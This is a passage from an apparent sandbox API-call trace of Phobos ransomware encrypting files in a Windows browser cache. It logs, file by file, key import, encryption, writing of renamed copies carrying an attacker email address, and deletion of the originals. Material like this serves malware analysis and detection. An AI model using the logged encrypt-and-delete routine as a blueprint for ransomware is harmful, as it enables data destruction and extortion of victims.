(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\benefits-2[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0179.794] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d68) returned 1 [0179.794] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0179.794] ReadFile (in: hFile=0x17c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x13c06, lpOverlapped=0x0) returned 1 [0179.816] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x13c10, dwBufLen=0x13c10 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x13c10) returned 1 [0179.816] WriteFile (in: hFile=0x15c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x13c10, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x13c10, lpOverlapped=0x0) returned 1 [0179.818] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32de8) returned 1 [0179.818] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0179.818] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0179.818] CryptDestroyKey (hKey=0xa32de8) returned 1 [0179.818] WriteFile (in: hFile=0x15c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x102, lpOverlapped=0x0) returned 1 [0179.818] CryptDestroyKey (hKey=0xa32d68) returned 1 [0179.818] CloseHandle (hObject=0x17c) returned 1 [0179.818] CloseHandle (hObject=0x15c) returned 1 [0179.818] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\benefits-2[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\benefits-2[1].jpg")) returned 1 [0179.819] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0179.819] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\benefits-4[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\benefits-4[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0179.820] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=83149) returned 1 [0179.820] CloseHandle (hObject=0x15c) returned 1 [0179.820] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\benefits-4[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\benefits-4[1].jpg")) returned 0x2020 [0179.820] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\benefits-4[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\benefits-4[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0179.820] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\benefits-4[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\benefits-4[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0179.820] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0179.820] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0179.820] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\benefits-4[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\benefits-4[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0179.821] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d68) returned 1 [0179.821] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0179.821] ReadFile (in: hFile=0x15c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x144cd, lpOverlapped=0x0) returned 1 [0179.832] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x144d0, dwBufLen=0x144d0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x144d0) returned 1 [0179.833] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x144d0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x144d0, lpOverlapped=0x0) returned 1 [0179.835] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32de8) returned 1 [0179.835] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0179.835] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0179.835] CryptDestroyKey (hKey=0xa32de8) returned 1 [0179.835] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x102, lpOverlapped=0x0) returned 1 [0179.835] CryptDestroyKey (hKey=0xa32d68) returned 1 [0179.835] CloseHandle (hObject=0x15c) returned 1 [0179.835] CloseHandle (hObject=0x17c) returned 1 [0179.835] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\benefits-4[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\benefits-4[1].jpg")) returned 1 [0179.836] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0179.836] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\bootstrap[1].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bootstrap[1].js"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0179.837] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=28437) returned 1 [0179.837] CloseHandle (hObject=0x17c) returned 1 [0179.837] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\bootstrap[1].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bootstrap[1].js")) returned 0x2020 [0179.837] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\bootstrap[1].js.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bootstrap[1].js.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0179.837] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\bootstrap[1].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bootstrap[1].js"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0179.837] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0179.838] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0179.838] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\bootstrap[1].js.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bootstrap[1].js.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0179.838] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d68) returned 1 [0179.838] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0179.838] ReadFile (in: hFile=0x17c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x6f15, lpOverlapped=0x0) returned 1 [0180.067] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x6f20, dwBufLen=0x6f20 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x6f20) returned 1 [0180.067] WriteFile (in: hFile=0x15c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x6f20, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x6f20, lpOverlapped=0x0) returned 1 [0180.068] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32de8) returned 1 [0180.068] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0180.068] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0180.068] CryptDestroyKey (hKey=0xa32de8) returned 1 [0180.068] WriteFile (in: hFile=0x15c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0180.069] CryptDestroyKey (hKey=0xa32d68) returned 1 [0180.069] CloseHandle (hObject=0x17c) returned 1 [0180.069] CloseHandle (hObject=0x15c) returned 1 [0180.069] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\bootstrap[1].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bootstrap[1].js")) returned 1 [0180.070] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0180.070] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\bs-jsdep[1].css" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bs-jsdep[1].css"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0180.072] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=19928) returned 1 [0180.072] CloseHandle (hObject=0x15c) returned 1 [0180.072] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\bs-jsdep[1].css" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bs-jsdep[1].css")) returned 0x2020 [0180.072] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\bs-jsdep[1].css.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bs-jsdep[1].css.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0180.072] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\bs-jsdep[1].css" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bs-jsdep[1].css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0180.072] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0180.072] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0180.072] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\bs-jsdep[1].css.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bs-jsdep[1].css.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0180.073] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d68) returned 1 [0180.073] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0180.073] ReadFile (in: hFile=0x15c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x4dd8, lpOverlapped=0x0) returned 1 [0180.085] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x4de0, dwBufLen=0x4de0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x4de0) returned 1 [0180.086] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x4de0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x4de0, lpOverlapped=0x0) returned 1 [0180.087] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ae8) returned 1 [0180.087] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0180.088] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0180.088] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0180.088] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0180.088] CryptDestroyKey (hKey=0xa32d68) returned 1 [0180.088] CloseHandle (hObject=0x15c) returned 1 [0180.088] CloseHandle (hObject=0x17c) returned 1 [0180.088] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\bs-jsdep[1].css" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bs-jsdep[1].css")) returned 1 [0180.089] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0180.089] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\collect[1].gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\collect[1].gif"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0180.090] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=43) returned 1 [0180.090] CloseHandle (hObject=0x17c) returned 1 [0180.090] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\collect[1].gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\collect[1].gif")) returned 0x2020 [0180.090] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\collect[1].gif.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\collect[1].gif.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0180.090] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\collect[1].gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\collect[1].gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0180.090] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0180.090] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0180.091] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\collect[1].gif.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\collect[1].gif.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0180.091] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d68) returned 1 [0180.091] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0180.091] ReadFile (in: hFile=0x17c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x2b, lpOverlapped=0x0) returned 1 [0180.113] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x30, dwBufLen=0x30 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x30) returned 1 [0180.113] WriteFile (in: hFile=0x15c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x30, lpOverlapped=0x0) returned 1 [0180.113] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ca8) returned 1 [0180.113] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0180.113] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0180.113] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0180.114] WriteFile (in: hFile=0x15c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0180.114] CryptDestroyKey (hKey=0xa32d68) returned 1 [0180.114] CloseHandle (hObject=0x17c) returned 1 [0180.114] CloseHandle (hObject=0x15c) returned 1 [0180.114] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\collect[1].gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\collect[1].gif")) returned 1 [0180.115] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0180.115] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0180.115] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=67) returned 1 